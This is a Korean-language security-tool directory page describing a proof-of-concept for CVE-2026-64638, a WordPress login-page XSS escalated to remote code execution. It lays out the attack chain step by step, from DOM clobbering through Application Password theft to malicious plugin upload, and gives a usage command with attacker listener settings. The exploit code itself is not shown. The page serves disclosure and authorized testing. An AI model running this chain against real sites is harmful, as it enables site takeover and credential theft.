Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-64638 — WordPress 사전 인증 XSS를 DOM clobbering, REST API 남용, 악성 플러그인 업로드를 통한 서버 측 실행으로 이어지는 RCE로 악용하는 개념 증명. 승인된 테스트만 허용됩니다. | Kitploit
도구/GitHubGitHub/hackspeak/cve-2026-64638
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingAdversarial Attack
GitHubhackspeak/cve-2026-64638

CVE-2026-64638

WordPress 사전 인증 XSS를 DOM clobbering, REST API 남용, 악성 플러그인 업로드를 통한 서버 측 실행으로 이어지는 RCE로 악용하는 개념 증명. 승인된 테스트만 허용됩니다.

저장소 보기
112일 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-64638 — XSS2Shell:WordPress 로그인 페이지 사전 인증 XSS → 서버 RCE

HackSpeak 배포 미러. 본 저장소는 WordSec이 공개한 XSS2Shell 교육용 PoC(CVE-2026-64638)의 배포 미러입니다, 코드는 업스트림과 동일합니다. 업스트림은 MIT License, Copyright (c) 2026 WordSec입니다.

⚠️ 보안 연구 및 승인된 테스트 전용입니다, 본인이 소유했거나 서면 승인을 받아 평가하는 WordPress 사이트에서만 실행하세요. PoC는 임시 게시물을 생성하고 정리하므로, 제3자 관리자나 운영 시스템을 대상으로 하지 마십시오.

취약점 개요

**XSS2Shell(CVE-2026-64638)**은 WordPress 로그인 페이지(wp-login.php)에서 발생하는 사전 인증 반사형 XSS로, 전체 체인을 통해 **서버 측 PHP 코드 실행(RCE)**으로 승격될 수 있습니다.

  • 근본 원인: PHP strip_tags()와 WordPress KSES(wp_kses_post()) 간의 파싱 불일치 — <와 태그 이름 사이에 공백을 삽입하면(예: < area), 전자는 일반 텍스트로 보존하고 후자는 허용 목록에 포함된 유효한 HTML 요소(<area>/<div>/<button> 모두 허용 목록에 있음)로 파싱합니다.
  • XSS: 인증 없이 위조된 사용자 이름을 제출하면 실패한 로그인 오류 페이지에서 트리거됩니다.
  • RCE 체인: DOM Clobbering으로 ajaxurl 하이재킹 → 로그인 페이지의 user-profile.js가 jQuery POST 자동 트리거 → REST API JSONP(_jsonp) → Same Origin Method Execution(SOME,Paulos Yibelo 2022) → 교차 창에서 관리자 Application Password 승인 버튼 클릭 → API 자격 증명 탈취 → <script>가 포함된 페이지 게시 → 악성 플러그인 ZIP 업로드 → PHP 직접 실행(활성화 불필요)
  • 영향: 거의 모든 WordPress 버전(4.9.0–7.0.2); 7.0.3(2026-08-06, 긴급)에서 수정되었으며, 4.7부터 모든 유지보수 브랜치로 백포트되었습니다.

사용법

root@kitploit:~
python3 xss2shell_poc.py -t http://wordpress.test --lhost 192.168.1.100 --lport 8080 -c "whoami"
매개변수설명
-t, --target

의존성: Python 3.7+, 타사 패키지 없음; 관리자가 대상 사이트에 로그인하고 공격자 URL을 열어야 합니다(1회 상호작용).

면책 조항

  • 보안 연구, 취약점 검증 및 방어적 테스트 용도로만 사용하세요; 폐기 가능한 환경에서 실행하고, 승인되지 않은 시스템에는 사용하지 마십시오.
  • PoC는 교육용 코드이며 공개된 기술 분석을 기반으로 합니다. 사용 전에 업스트림 설명과 대상 승인 범위를 읽으십시오.

참고 링크

  • 업스트림 소스 저장소(본 PoC 출처):https://github.com/wordsec/XSS2Shell
  • pwn.ai 공식 공개:XSS2Shell — https://pwn.ai/blog/xss2shell
  • WordPress 공식 보안 공지:GHSA-52p2-r8wf-jcrf — https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-52p2-r8wf-jcrf
  • WordPress 7.0.3 릴리스 공지:https://wordpress.org/news/2026/08/wordpress-7-0-3-release/
  • The Hacker News 보도:https://thehackernews.com/2026/08/new-wordpress-pre-auth-xss-could-lead.html
  • WordSec 기술 분석 + PoC 설명:https://wordsec.net/blog/xss2shell-wordpress-pre-auth-xss-to-rce-cve-2026-64638
도구 다운로드
WordPress 기본 주소(http/https 포함, 끝 슬래시 자동 정규화)
-c, --command셸 준비 후 실행할 명령어
--lhost / --lport리슨 주소/포트(lport 0 = 무작위)
--keep임시 게시물 페이지 유지(기본값은 정리)